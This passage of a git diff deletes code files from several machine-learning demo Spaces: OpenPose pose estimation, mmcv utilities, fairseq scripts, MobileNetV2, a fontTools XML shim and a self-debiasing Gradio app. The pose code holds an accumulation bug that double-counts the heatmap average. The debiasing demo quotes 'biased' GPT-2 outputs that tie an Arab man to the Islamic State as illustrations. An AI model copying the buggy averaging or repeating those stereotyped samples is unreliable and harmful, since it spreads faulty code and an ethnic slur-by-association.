np.newaxis]), (3, 2, 0, 1)) / 256 - 0.5 - im = np.ascontiguousarray(im) - - data = torch.from_numpy(im).float() - if torch.cuda.is_available(): - data = data.cuda() - # data = data.permute([2, 0, 1]).unsqueeze(0).float() - with torch.no_grad(): - Mconv7_stage6_L1, Mconv7_stage6_L2 = self.model(data) - Mconv7_stage6_L1 = Mconv7_stage6_L1.cpu().numpy() - Mconv7_stage6_L2 = Mconv7_stage6_L2.cpu().numpy() - - # extract outputs, resize, and remove padding - # heatmap = np.transpose(np.squeeze(net.blobs[output_blobs.keys()[1]].data), (1, 2, 0)) # output 1 is heatmaps - heatmap = np.transpose(np.squeeze(Mconv7_stage6_L2), (1, 2, 0)) # output 1 is heatmaps - heatmap = cv2.resize(heatmap, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC) - heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :] - heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC) - - # paf = np.transpose(np.squeeze(net.blobs[output_blobs.keys()[0]].data), (1, 2, 0)) # output 0 is PAFs - paf = np.transpose(np.squeeze(Mconv7_stage6_L1), (1, 2, 0)) # output 0 is PAFs - paf = cv2.resize(paf, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC) - paf = paf[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :] - paf = cv2.resize(paf, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC) - - heatmap_avg += heatmap_avg + heatmap / len(multiplier) - paf_avg += + paf / len(multiplier) - - all_peaks = [] - peak_counter = 0 - - for part in range(18): - map_ori = heatmap_avg[:, :, part] - one_heatmap = gaussian_filter(map_ori, sigma=3) - - map_left = np.zeros(one_heatmap.shape) - map_left[1:, :] = one_heatmap[:-1, :] - map_right = np.zeros(one_heatmap.shape) - map_right[:-1, :] = one_heatmap[1:, :] - map_up = np.zeros(one_heatmap.shape) - map_up[:, 1:] = one_heatmap[:, :-1] - map_down = np.zeros(one_heatmap.shape) - map_down[:, :-1] = one_heatmap[:, 1:] - - peaks_binary = np.logical_and.reduce( - (one_heatmap >= map_left, one_heatmap >= map_right, one_heatmap >= map_up, one_heatmap >= map_down, one_heatmap > thre1)) - peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0])) # note reverse - peaks_with_score = [x + (map_ori[x[1], x[0]],) for x in peaks] - peak_id = range(peak_counter, peak_counter + len(peaks)) - peaks_with_score_and_id = [peaks_with_score[i] + (peak_id[i],) for i in range(len(peak_id))] - - all_peaks.append(peaks_with_score_and_id) - peak_counter += len(peaks) - - # find connection in the specified sequence, center 29 is in the position 15 - limbSeq = [[2, 3], [2, 6], [3, 4], [4, 5], [6, 7], [7, 8], [2, 9], [9, 10], \ - [10, 11], [2, 12], [12, 13], [13, 14], [2, 1], [1, 15], [15, 17], \ - [1, 16], [16, 18], [3, 17], [6, 18]] - # the middle joints heatmap correpondence - mapIdx = [[31, 32], [39, 40], [33, 34], [35, 36], [41, 42], [43, 44], [19, 20], [21, 22], \ - [23, 24], [25, 26], [27, 28], [29, 30], [47, 48], [49, 50], [53, 54], [51, 52], \ - [55, 56], [37, 38], [45, 46]] - - connection_all = [] - special_k = [] - mid_num = 10 - - for k in range(len(mapIdx)): - score_mid = paf_avg[:, :, [x - 19 for x in mapIdx[k]]] - candA = all_peaks[limbSeq[k][0] - 1] - candB = all_peaks[limbSeq[k][1] - 1] - nA = len(candA) - nB = len(candB) - indexA, indexB = limbSeq[k] - if (nA != 0 and nB != 0): - connection_candidate = [] - for i in range(nA): - for j in range(nB): - vec = np.subtract(candB[j][:2], candA[i][:2]) - norm = math.sqrt(vec[0] * vec[0] + vec[1] * vec[1]) - norm = max(0.001, norm) - vec = np.divide(vec, norm) - - startend = list(zip(np.linspace(candA[i][0], candB[j][0], num=mid_num), \ - np.linspace(candA[i][1], candB[j][1], num=mid_num))) - - vec_x = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 0] \ - for I in range(len(startend))]) - vec_y = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 1] \ - for I in range(len(startend))]) - - score_midpts = np.multiply(vec_x, vec[0]) + np.multiply(vec_y, vec[1]) - score_with_dist_prior = sum(score_midpts) / len(score_midpts) + min( - 0.5 * oriImg.shape[0] / norm - 1, 0) - criterion1 = len(np.nonzero(score_midpts > thre2)[0]) > 0.8 * len(score_midpts) - criterion2 = score_with_dist_prior > 0 - if criterion1 and criterion2: - connection_candidate.append( - [i, j, score_with_dist_prior, score_with_dist_prior + candA[i][2] + candB[j][2]]) - - connection_candidate = sorted(connection_candidate, key=lambda x: x[2], reverse=True) - connection = np.zeros((0, 5)) - for c in range(len(connection_candidate)): - i, j, s = connection_candidate[c][0:3] - if (i not in connection[:, 3] and j not in connection[:, 4]): - connection = np.vstack([connection, [candA[i][3], candB[j][3], s, i, j]]) - if (len(connection) >= min(nA, nB)): - break - - connection_all.append(connection) - else: - special_k.append(k) - connection_all.append([]) - - # last number in each row is the total parts number of that person - # the second last number in each row is the score of the overall configuration - subset = -1 * np.ones((0, 20)) - candidate = np.array([item for sublist in all_peaks for item in sublist]) - - for k in range(len(mapIdx)): - if k not in special_k: - partAs = connection_all[k][:, 0] - partBs = connection_all[k][:, 1] - indexA, indexB = np.array(limbSeq[k]) - 1 - - for i in range(len(connection_all[k])): # = 1:size(temp,1) - found = 0 - subset_idx = [-1, -1] - for j in range(len(subset)): # 1:size(subset,1): - if subset[j][indexA] == partAs[i] or subset[j][indexB] == partBs[i]: - subset_idx[found] = j - found += 1 - - if found == 1: - j = subset_idx[0] - if subset[j][indexB] != partBs[i]: - subset[j][indexB] = partBs[i] - subset[j][-1] += 1 - subset[j][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2] - elif found == 2: # if found 2 and disjoint, merge them - j1, j2 = subset_idx - membership = ((subset[j1] >= 0).astype(int) + (subset[j2] >= 0).astype(int))[:-2] - if len(np.nonzero(membership == 2)[0]) == 0: # merge - subset[j1][:-2] += (subset[j2][:-2] + 1) - subset[j1][-2:] += subset[j2][-2:] - subset[j1][-2] += connection_all[k][i][2] - subset = np.delete(subset, j2, 0) - else: # as like found == 1 - subset[j1][indexB] = partBs[i] - subset[j1][-1] += 1 - subset[j1][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2] - - # if find no partA in the subset, create a new subset - elif not found and k < 17: - row = -1 * np.ones(20) - row[indexA] = partAs[i] - row[indexB] = partBs[i] - row[-1] = 2 - row[-2] = sum(candidate[connection_all[k][i, :2].astype(int), 2]) + connection_all[k][i][2] - subset = np.vstack([subset, row]) - # delete some rows of subset which has few parts occur - deleteIdx = [] - for i in range(len(subset)): - if subset[i][-1] < 4 or subset[i][-2] / subset[i][-1] < 0.4: - deleteIdx.append(i) - subset = np.delete(subset, deleteIdx, axis=0) - - # subset: n*20 array, 0-17 is the index in candidate, 18 is the total score, 19 is the total parts - # candidate: x, y, score, id - return candidate, subset - -if __name__ == "__main__": - body_estimation = Body('../model/body_pose_model.pth') - - test_image = '../images/ski.jpg' - oriImg = cv2.imread(test_image) # B,G,R order - candidate, subset = body_estimation(oriImg) - canvas = util.draw_bodypose(oriImg, candidate, subset) - plt.imshow(canvas[:, :, [2, 1, 0]]) - plt.show() diff --git a/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmcv/utils/path.py b/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmcv/utils/path.py deleted file mode 100644 index 7dab4b3041413b1432b0f434b8b14783097d33c6..0000000000000000000000000000000000000000 --- a/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmcv/utils/path.py +++ /dev/null @@ -1,101 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import os -import os.path as osp -from pathlib import Path - -from .misc import is_str - - -def is_filepath(x): - return is_str(x) or isinstance(x, Path) - - -def fopen(filepath, *args, **kwargs): - if is_str(filepath): - return open(filepath, *args, **kwargs) - elif isinstance(filepath, Path): - return filepath.open(*args, **kwargs) - raise ValueError('`filepath` should be a string or a Path') - - -def check_file_exist(filename, msg_tmpl='file "{}" does not exist'): - if not osp.isfile(filename): - raise FileNotFoundError(msg_tmpl.format(filename)) - - -def mkdir_or_exist(dir_name, mode=0o777): - if dir_name == '': - return - dir_name = osp.expanduser(dir_name) - os.makedirs(dir_name, mode=mode, exist_ok=True) - - -def symlink(src, dst, overwrite=True, **kwargs): - if os.path.lexists(dst) and overwrite: - os.remove(dst) - os.symlink(src, dst, **kwargs) - - -def scandir(dir_path, suffix=None, recursive=False, case_sensitive=True): - """Scan a directory to find the interested files. - - Args: - dir_path (str | obj:`Path`): Path of the directory. - suffix (str | tuple(str), optional): File suffix that we are - interested in. Default: None. - recursive (bool, optional): If set to True, recursively scan the - directory. Default: False. - case_sensitive (bool, optional) : If set to False, ignore the case of - suffix. Default: True. - - Returns: - A generator for all the interested files with relative paths. - """ - if isinstance(dir_path, (str, Path)): - dir_path = str(dir_path) - else: - raise TypeError('"dir_path" must be a string or Path object') - - if (suffix is not None) and not isinstance(suffix, (str, tuple)): - raise TypeError('"suffix" must be a string or tuple of strings') - - if suffix is not None and not case_sensitive: - suffix = suffix.lower() if isinstance(suffix, str) else tuple( - item.lower() for item in suffix) - - root = dir_path - - def _scandir(dir_path, suffix, recursive, case_sensitive): - for entry in os.scandir(dir_path): - if not entry.name.startswith('.') and entry.is_file(): - rel_path = osp.relpath(entry.path, root) - _rel_path = rel_path if case_sensitive else rel_path.lower() - if suffix is None or _rel_path.endswith(suffix): - yield rel_path - elif recursive and os.path.isdir(entry.path): - # scan recursively if entry.path is a directory - yield from _scandir(entry.path, suffix, recursive, - case_sensitive) - - return _scandir(dir_path, suffix, recursive, case_sensitive) - - -def find_vcs_root(path, markers=('.git', )): - """Finds the root directory (including itself) of specified markers. - - Args: - path (str): Path of directory or file. - markers (list[str], optional): List of file or directory names. - - Returns: - The directory contained one of the markers or None if not found. - """ - if osp.isfile(path): - path = osp.dirname(path) - - prev, cur = None, osp.abspath(osp.expanduser(path)) - while cur != prev: - if any(osp.exists(osp.join(cur, marker)) for marker in markers): - return cur - prev, cur = cur, osp.split(cur)[0] - return None diff --git a/spaces/koajoel/PolyFormer/fairseq/examples/criss/download_and_preprocess_flores_test.sh b/spaces/koajoel/PolyFormer/fairseq/examples/criss/download_and_preprocess_flores_test.sh deleted file mode 100644 index ed4b390fbdee3991efeb298050e12065d7fe605b..0000000000000000000000000000000000000000 --- a/spaces/koajoel/PolyFormer/fairseq/examples/criss/download_and_preprocess_flores_test.sh +++ /dev/null @@ -1,64 +0,0 @@ -#!/bin/bash -# Copyright (c) Facebook, Inc. and its affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -SPM_ENCODE=flores/scripts/spm_encode.py -DATA=data_tmp -SPM_MODEL=criss_checkpoints/sentence.bpe.model -DICT=criss_checkpoints/dict.txt - -download_data() { - CORPORA=$1 - URL=$2 - - if [ -f $CORPORA ]; then - echo "$CORPORA already exists, skipping download" - else - echo "Downloading $URL" - wget $URL -O $CORPORA --no-check-certificate || rm -f $CORPORA - if [ -f $CORPORA ]; then - echo "$URL successfully downloaded." - else - echo "$URL not successfully downloaded." - rm -f $CORPORA - fi - fi -} - -if [[ -f flores ]]; then - echo "flores already cloned" -else - git clone https://github.com/facebookresearch/flores -fi - -mkdir -p $DATA -download_data $DATA/wikipedia_en_ne_si_test_sets.tgz "https://github.com/facebookresearch/flores/raw/master/data/wikipedia_en_ne_si_test_sets.tgz" -pushd $DATA -pwd -tar -vxf wikipedia_en_ne_si_test_sets.tgz -popd - - -for lang in ne_NP si_LK; do - datadir=$DATA/${lang}-en_XX-flores - rm -rf $datadir - mkdir -p $datadir - TEST_PREFIX=$DATA/wikipedia_en_ne_si_test_sets/wikipedia.test - python $SPM_ENCODE \ - --model ${SPM_MODEL} \ - --output_format=piece \ - --inputs ${TEST_PREFIX}.${lang:0:2}-en.${lang:0:2} ${TEST_PREFIX}.${lang:0:2}-en.en \ - --outputs $datadir/test.bpe.${lang}-en_XX.${lang} $datadir/test.bpe.${lang}-en_XX.en_XX - - # binarize data - fairseq-preprocess \ - --source-lang ${lang} --target-lang en_XX \ - --testpref $datadir/test.bpe.${lang}-en_XX \ - --destdir $datadir \ - --srcdict ${DICT} \ - --joined-dictionary \ - --workers 4 -done diff --git a/spaces/koajoel/PolyFormer/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py b/spaces/koajoel/PolyFormer/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py deleted file mode 100644 index 44f7989bd863329f763aa62b78df2eb42b3084ea..0000000000000000000000000000000000000000 --- a/spaces/koajoel/PolyFormer/fairseq/examples/linformer/linformer_src/modules/linformer_sentence_encoder.py +++ /dev/null @@ -1,54 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math - -import torch.nn as nn -from fairseq.models.transformer import TransformerEncoder - -from .linformer_sentence_encoder_layer import LinformerTransformerEncoderLayer - - -class LinformerTransformerEncoder(TransformerEncoder): - """ - Implementation for a Bi-directional Linformer based Sentence Encoder used - in BERT/XLM style pre-trained models. - - This first computes the token embedding using the token embedding matrix, - position embeddings (if specified) and segment embeddings - (if specified). After applying the specified number of - LinformerEncoderLayers, it outputs all the internal states of the - encoder as well as the final representation associated with the first - token (usually CLS token). - - Input: - - tokens: B x T matrix representing sentences - - segment_labels: B x T matrix representing segment label for tokens - - Output: - - a tuple of the following: - - a list of internal model states used to compute the - predictions where each tensor has shape T x B x C - - sentence representation associated with first input token - in format B x C. - """ - - def __init__(self, args, dictionary, embed_tokens): - self.compress_layer = None - super().__init__(args, dictionary, embed_tokens) - - def build_encoder_layer(self, args): - if self.args.shared_layer_kv_compressed == 1 and self.compress_layer is None: - compress_layer = nn.Linear( - self.args.max_positions, - self.args.max_positions // self.args.compressed, - ) - # intialize parameters for compressed layer - nn.init.xavier_uniform_(compress_layer.weight, gain=1 / math.sqrt(2)) - if self.args.freeze_compress == 1: - compress_layer.weight.requires_grad = False - self.compress_layer = compress_layer - - return LinformerTransformerEncoderLayer(args, self.compress_layer) diff --git a/spaces/kquote03/lama-video-watermark-remover/models/ade20k/mobilenet.py b/spaces/kquote03/lama-video-watermark-remover/models/ade20k/mobilenet.py deleted file mode 100644 index f501266e56ee71cdf455744020f8fc1a58ec9fff..0000000000000000000000000000000000000000 --- a/spaces/kquote03/lama-video-watermark-remover/models/ade20k/mobilenet.py +++ /dev/null @@ -1,154 +0,0 @@ -""" -This MobileNetV2 implementation is modified from the following repository: -https://github.com/tonylins/pytorch-mobilenet-v2 -""" - -import torch.nn as nn -import math -from .utils import load_url -from .segm_lib.nn import SynchronizedBatchNorm2d - -BatchNorm2d = SynchronizedBatchNorm2d - - -__all__ = ['mobilenetv2'] - - -model_urls = { - 'mobilenetv2': 'http://sceneparsing.csail.mit.edu/model/pretrained_resnet/mobilenet_v2.pth.tar', -} - - -def conv_bn(inp, oup, stride): - return nn.Sequential( - nn.Conv2d(inp, oup, 3, stride, 1, bias=False), - BatchNorm2d(oup), - nn.ReLU6(inplace=True) - ) - - -def conv_1x1_bn(inp, oup): - return nn.Sequential( - nn.Conv2d(inp, oup, 1, 1, 0, bias=False), - BatchNorm2d(oup), - nn.ReLU6(inplace=True) - ) - - -class InvertedResidual(nn.Module): - def __init__(self, inp, oup, stride, expand_ratio): - super(InvertedResidual, self).__init__() - self.stride = stride - assert stride in [1, 2] - - hidden_dim = round(inp * expand_ratio) - self.use_res_connect = self.stride == 1 and inp == oup - - if expand_ratio == 1: - self.conv = nn.Sequential( - # dw - nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), - BatchNorm2d(hidden_dim), - nn.ReLU6(inplace=True), - # pw-linear - nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), - BatchNorm2d(oup), - ) - else: - self.conv = nn.Sequential( - # pw - nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False), - BatchNorm2d(hidden_dim), - nn.ReLU6(inplace=True), - # dw - nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), - BatchNorm2d(hidden_dim), - nn.ReLU6(inplace=True), - # pw-linear - nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), - BatchNorm2d(oup), - ) - - def forward(self, x): - if self.use_res_connect: - return x + self.conv(x) - else: - return self.conv(x) - - -class MobileNetV2(nn.Module): - def __init__(self, n_class=1000, input_size=224, width_mult=1.): - super(MobileNetV2, self).__init__() - block = InvertedResidual - input_channel = 32 - last_channel = 1280 - interverted_residual_setting = [ - # t, c, n, s - [1, 16, 1, 1], - [6, 24, 2, 2], - [6, 32, 3, 2], - [6, 64, 4, 2], - [6, 96, 3, 1], - [6, 160, 3, 2], - [6, 320, 1, 1], - ] - - # building first layer - assert input_size % 32 == 0 - input_channel = int(input_channel * width_mult) - self.last_channel = int(last_channel * width_mult) if width_mult > 1.0 else last_channel - self.features = [conv_bn(3, input_channel, 2)] - # building inverted residual blocks - for t, c, n, s in interverted_residual_setting: - output_channel = int(c * width_mult) - for i in range(n): - if i == 0: - self.features.append(block(input_channel, output_channel, s, expand_ratio=t)) - else: - self.features.append(block(input_channel, output_channel, 1, expand_ratio=t)) - input_channel = output_channel - # building last several layers - self.features.append(conv_1x1_bn(input_channel, self.last_channel)) - # make it nn.Sequential - self.features = nn.Sequential(*self.features) - - # building classifier - self.classifier = nn.Sequential( - nn.Dropout(0.2), - nn.Linear(self.last_channel, n_class), - ) - - self._initialize_weights() - - def forward(self, x): - x = self.features(x) - x = x.mean(3).mean(2) - x = self.classifier(x) - return x - - def _initialize_weights(self): - for m in self.modules(): - if isinstance(m, nn.Conv2d): - n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels - m.weight.data.normal_(0, math.sqrt(2. / n)) - if m.bias is not None: - m.bias.data.zero_() - elif isinstance(m, BatchNorm2d): - m.weight.data.fill_(1) - m.bias.data.zero_() - elif isinstance(m, nn.Linear): - n = m.weight.size(1) - m.weight.data.normal_(0, 0.01) - m.bias.data.zero_() - - -def mobilenetv2(pretrained=False, **kwargs): - """Constructs a MobileNet_V2 model. - - Args: - pretrained (bool): If True, returns a model pre-trained on ImageNet - """ - model = MobileNetV2(n_class=1000, **kwargs) - if pretrained: - model.load_state_dict(load_url(model_urls['mobilenetv2']), strict=False) - return model \ No newline at end of file diff --git a/spaces/kunwarsaaim/Self-Debiasing/app.py b/spaces/kunwarsaaim/Self-Debiasing/app.py deleted file mode 100644 index 932a25c8dcb95ba645f9e0b60cdc07f54dbdc523..0000000000000000000000000000000000000000 --- a/spaces/kunwarsaaim/Self-Debiasing/app.py +++ /dev/null @@ -1,60 +0,0 @@ -import torch -from modeling import GPT2Wrapper -import gradio as gr - - -DEBIASING_PREFIXES = [ - "The following text contains rude, disrespectful, or unreasonable language:\n", - "The following text contains very hateful, aggressive, disrespectful language:\n", - "The following text contains sexually explicit language:\n", - "The following text contains a threat:\n", - "The following text contains negative or hateful language targeting someone because of their identity:\n", - "The following text contains swear words, curse words, or other obscene or profane language:\n" -] - -DEBIASING_KEYWORDS = [ - "(rude) ", "(sexually explicit) ", "(hateful) ", "(aggressive) ", "(racist) ", "(threat) ", "(violent) ", "(sexist) " -] - -if torch.cuda.is_available(): - use_cuda = True -else: - use_cuda = False - -def debias(prompt, model,use_prefix, max_length=50, num_beam=3): - """ - Debiasing inference function. - :param prompt: The prompt to be debiased. - :param model: The GPT2 model. - :param max_length: The maximum length of the output sentence. - :return: The debiased output sentence. - """ - wrapper = GPT2Wrapper(model_name=str(model), use_cuda=use_cuda) - if use_prefix == 'Prefixes': - debiasing_prefixes = DEBIASING_PREFIXES - else: - debiasing_prefixes = DEBIASING_KEYWORDS - - output_text = output_text = wrapper.generate_self_debiasing([prompt], debiasing_prefixes= debiasing_prefixes,min_length=20, max_length=max_length, num_beam=num_beam,no_repeat_ngram_size=2) - output_text = output_text[0] - - debiasing_prefixes = [] - biased_text = wrapper.generate_self_debiasing([prompt], debiasing_prefixes= debiasing_prefixes,min_length=20, max_length=max_length, num_beam=num_beam,no_repeat_ngram_size=2) - biased_text = biased_text[0] - return output_text, biased_text, "

    Examples

    \n
    • Prompt: My professor is a hispanic man
      Debiased Text: , and he's always had this weird feeling that his parents were not really there, but they were there. And then, of course, there was the whole thing about the kids, which was that they had to be there for the rest of their
      Biased Text: . He's a very good student. I'm not sure if he's really a good person, but he is very intelligent. \"I think he has a lot of respect for the people he works with. It's not like he doesn
    • Prompt: He is an Arab from the Middle East.
      Debiased Text: He has been a journalist since 2002, when he was a student at the London School of Economics. He said: \"I've always been interested in the world of politics. I've been involved in politics for many years and I'm very
      Biased Text: He is a member of the Islamic State. \"He has been in Syria for a long time. We have seen him in the past. I think he is very well-known in this country. But he has not been able to get
    " - - -demo = gr.Interface( - debias, - inputs = [gr.Textbox(), - gr.Radio(choices=['gpt2', 'gpt2-medium', 'gpt2-large', 'gpt2-xl'],value='gpt2'), - gr.Radio(choices=['Prefixes','Keywords'],value='Prefixes',label='Use Debiasing Prefixes or Keywords'), - gr.Number(value=50,label='Max output length'), - gr.Number(value=3,label='Number of beams for beam search')], - outputs = [gr.Textbox(label="Debiased text"),gr.Textbox(label="Biased text"), gr.Markdown( - value="

    Examples

    \n
    • Prompt: My professor is a hispanic man
      Debiased Text: , and he's always had this weird feeling that his parents were not really there, but they were there. And then, of course, there was the whole thing about the kids, which was that they had to be there for the rest of their
      Biased Text: . He's a very good student. I'm not sure if he's really a good person, but he is very intelligent. \"I think he has a lot of respect for the people he works with. It's not like he doesn
    • Prompt: He is an Arab from the Middle East.
      Debiased Text: He has been a journalist since 2002, when he was a student at the London School of Economics. He said: \"I've always been interested in the world of politics. I've been involved in politics for many years and I'm very
      Biased Text: He is a member of the Islamic State. \"He has been in Syria for a long time. We have seen him in the past. I think he is very well-known in this country. But he has not been able to get
    ")], - description = 'Self-Diagnosis and Self-Debiasing: A Proposal for Reducing Corpus-Based Bias in NLP' - ) -if __name__ == '__main__': - - demo.launch() \ No newline at end of file diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/misc/etree.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/misc/etree.py deleted file mode 100644 index 9d4a65c36014c8381306968c69432f50f0c0b886..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/misc/etree.py +++ /dev/null @@ -1,478 +0,0 @@ -"""Shim module exporting the same ElementTree API for lxml and -xml.etree backends. - -When lxml is installed, it is automatically preferred over the built-in -xml.etree module. -On Python 2.7, the cElementTree module is preferred over the pure-python -ElementTree module. - -Besides exporting a unified interface, this also defines extra functions -or subclasses built-in ElementTree classes to add features that are -only availble in lxml, like OrderedDict for attributes, pretty_print and -iterwalk. -""" -from fontTools.misc.textTools import tostr - - -XML_DECLARATION = """""" - -__all__ = [ - # public symbols - "Comment", - "dump", - "Element", - "ElementTree", - "fromstring", - "fromstringlist", - "iselement", - "iterparse", - "parse", - "ParseError", - "PI", - "ProcessingInstruction", - "QName", - "SubElement", - "tostring", - "tostringlist", - "TreeBuilder", - "XML", - "XMLParser", - "register_namespace", -] - -try: - from lxml.etree import * - - _have_lxml = True -except ImportError: - try: - from xml.etree.cElementTree import * - - # the cElementTree version of XML function doesn't support - # the optional 'parser' keyword argument - from xml.etree.ElementTree import XML - except ImportError: # pragma: no cover - from xml.etree.ElementTree import * - _have_lxml = False - - import sys - - # dict is always ordered in python >= 3.6 and on pypy - PY36 = sys.version_info >= (3, 6) - try: - import __pypy__ - except ImportError: - __pypy__ = None - _dict_is_ordered = bool(PY36 or __pypy__) - del PY36, __pypy__ - - if _dict_is_ordered: - _Attrib = dict - else: - from collections import OrderedDict as _Attrib - - if isinstance(Element, type): - _Element = Element - else: - # in py27, cElementTree.Element cannot be subclassed, so - # we need to import the pure-python class - from xml.etree.ElementTree import Element as _Element - - class Element(_Element): - """Element subclass that keeps the order of attributes.""" - - def __init__(self, tag, attrib=_Attrib(), **extra): - super(Element, self).__init__(tag) - self.attrib = _Attrib() - if attrib: - self.attrib.update(attrib) - if extra: - self.attrib.update(extra) - - def SubElement(parent, tag, attrib=_Attrib(), **extra): - """Must override SubElement as well otherwise _elementtree.SubElement - fails if 'parent' is a subclass of Element object. - """ - element = parent.__class__(tag, attrib, **extra) - parent.append(element) - return element - - def _iterwalk(element, events, tag): - include = tag is None or element.tag == tag - if include and "start" in events: - yield ("start", element) - for e in element: - for item in _iterwalk(e, events, tag): - yield item - if include: - yield ("end", element) - - def iterwalk(element_or_tree, events=("end",), tag=None): - """A tree walker that generates events from an existing tree as - if it was parsing XML data with iterparse(). - Drop-in replacement for lxml.etree.iterwalk. - """ - if iselement(element_or_tree): - element = element_or_tree - else: - element = element_or_tree.getroot() - if tag == "*": - tag = None - for item in _iterwalk(element, events, tag): - yield item - - _ElementTree = ElementTree - - class ElementTree(_ElementTree): - """ElementTree subclass that adds 'pretty_print' and 'doctype' - arguments to the 'write' method. - Currently these are only supported for the default XML serialization - 'method', and not also for "html" or "text", for these are delegated - to the base class. - """ - - def write( - self, - file_or_filename, - encoding=None, - xml_declaration=False, - method=None, - doctype=None, - pretty_print=False, - ): - if method and method != "xml": - # delegate to super-class - super(ElementTree, self).write( - file_or_filename, - encoding=encoding, - xml_declaration=xml_declaration, - method=method, - ) - return - - if encoding is not None and encoding.lower() == "unicode": - if xml_declaration: - raise ValueError( - "Serialisation to unicode must not request an XML declaration" - ) - write_declaration = False - encoding = "unicode" - elif xml_declaration is None: - # by default, write an XML declaration only for non-standard encodings - write_declaration = encoding is not None and encoding.upper() not in ( - "ASCII", - "UTF-8", - "UTF8", - "US-ASCII", - ) - else: - write_declaration = xml_declaration - - if encoding is None: - encoding = "ASCII" - - if pretty_print: - # NOTE this will modify the tree in-place - _indent(self._root) - - with _get_writer(file_or_filename, encoding) as write: - if write_declaration: - write(XML_DECLARATION % encoding.upper()) - if pretty_print: - write("\n") - if doctype: - write(_tounicode(doctype)) - if pretty_print: - write("\n") - - qnames, namespaces = _namespaces(self._root) - _serialize_xml(write, self._root, qnames, namespaces) - - import io - - def tostring( - element, - encoding=None, - xml_declaration=None, - method=None, - doctype=None, - pretty_print=False, - ): - """Custom 'tostring' function that uses our ElementTree subclass, with - pretty_print support. - """ - stream = io.StringIO() if encoding == "unicode" else io.BytesIO() - ElementTree(element).write( - stream, - encoding=encoding, - xml_declaration=xml_declaration, - method=method, - doctype=doctype, - pretty_print=pretty_print, - ) - return stream.getvalue() - - # serialization support - - import re - - # Valid XML strings can include any Unicode character, excluding control - # characters, the surrogate blocks, FFFE, and FFFF: - # Char ::= #x9 | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | [#x10000-#x10FFFF] - # Here we reversed the pattern to match only the invalid characters. - # For the 'narrow' python builds supporting only UCS-2, which represent - # characters beyond BMP as UTF-16 surrogate pairs, we need to pass through - # the surrogate block. I haven't found a more elegant solution... - UCS2 = sys.maxunicode < 0x10FFFF - if UCS2: - _invalid_xml_string = re.compile( - "[\u0000-\u0008\u000B-\u000C\u000E-\u001F\uFFFE-\uFFFF]" - ) - else: - _invalid_xml_string = re.compile( - "[\u0000-\u0008\u000B-\u000C\u000E-\u001F\uD800-\uDFFF\uFFFE-\uFFFF]" - ) - - def _tounicode(s): - """Test if a string is valid user input and decode it to unicode string - using ASCII encoding if it's a bytes string. - Reject all bytes/unicode input that contains non-XML characters. - Reject all bytes input that contains non-ASCII characters. - """ - try: - s = tostr(s, encoding="ascii", errors="strict") - except UnicodeDecodeError: - raise ValueError( - "Bytes strings can only contain ASCII characters. " - "Use unicode strings for non-ASCII characters." - ) - except AttributeError: - _raise_serialization_error(s) - if s and _invalid_xml_string.search(s): - raise ValueError( - "All strings must be XML compatible: Unicode or ASCII, " - "no NULL bytes or control characters" - ) - return s - - import contextlib - - @contextlib.contextmanager - def _get_writer(file_or_filename, encoding): - # returns text write method and release all resources after using - try: - write = file_or_filename.write - except AttributeError: - # file_or_filename is a file name - f = open( - file_or_filename, - "w", - encoding="utf-8" if encoding == "unicode" else encoding, - errors="xmlcharrefreplace", - ) - with f: - yield f.write - else: - # file_or_filename is a file-like object - # encoding determines if it is a text or binary writer - if encoding == "unicode": - # use a text writer as is - yield write - else: - # wrap a binary writer with TextIOWrapper - detach_buffer = False - if isinstance(file_or_filename, io.BufferedIOBase): - buf = file_or_filename - elif isinstance(file_or_filename, io.RawIOBase): - buf = io.BufferedWriter(file_or_filename) - detach_buffer = True - else: - # This is to handle passed objects that aren't in the - # IOBase hierarchy, but just have a write method - buf = io.BufferedIOBase() - buf.writable = lambda: True - buf.write = write - try: - # TextIOWrapper uses this methods to determine - # if BOM (for UTF-16, etc) should be added - buf.seekable = file_or_filename.seekable - buf.tell = file_or_filename.tell - except AttributeError: - pass - wrapper = io.TextIOWrapper( - buf, - encoding=encoding, - errors="xmlcharrefreplace", - newline="\n", - ) - try: - yield wrapper.write - finally: - # Keep the original file open when the TextIOWrapper and - # the BufferedWriter are destroyed - wrapper.detach() - if detach_buffer: - buf.detach() - - from xml.etree.ElementTree import _namespace_map - - def _namespaces(elem): - # identify namespaces used in this tree - - # maps qnames to *encoded* prefix:local names - qnames = {None: None} - - # maps uri:s to prefixes - namespaces = {} - - def add_qname(qname): - # 